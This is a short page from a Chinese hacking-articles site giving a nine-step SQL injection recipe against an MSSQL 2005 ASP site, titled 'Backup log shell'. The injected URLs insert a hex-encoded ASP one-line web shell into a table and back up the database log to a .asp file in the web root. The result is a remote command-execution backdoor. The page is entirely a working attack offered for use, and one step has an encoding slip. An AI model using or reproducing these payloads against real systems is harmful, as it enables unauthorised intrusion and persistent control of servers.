MSSQL 2005 Backup log shell 浏览黑客文章黑客防线

黑客文章 - 数据库注入 - 浏览 - MSSQL 2005 Backup log shell

MSSQL 2005 Backup log shell

http://www.hacker.com.cn/ 2008-9-12 0:25:47

MSSQL 2005 Backup log shell

第一步

http://www.sb.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--

第二步：

http://www.sb.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

第三步

http://www.sb.com/test.asp';drop/**/table/**/[itpro]--

第四步

http://www.sb.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--

第五步

http://www.sb.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

第六步

http://www.sb.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--

第七步

http://www.sb.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

第八步

http://www.sb.com/test.asp';drop/**/table/**/[itpro]--

第九步

http://www.sb.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

所属分类: 数据库注入所属专题:

共有 290 人次浏览收藏本页返回上一页

相关评论 (共0条, 查看所有评论)

发表评论

黑客文章专题

黑客文章搜索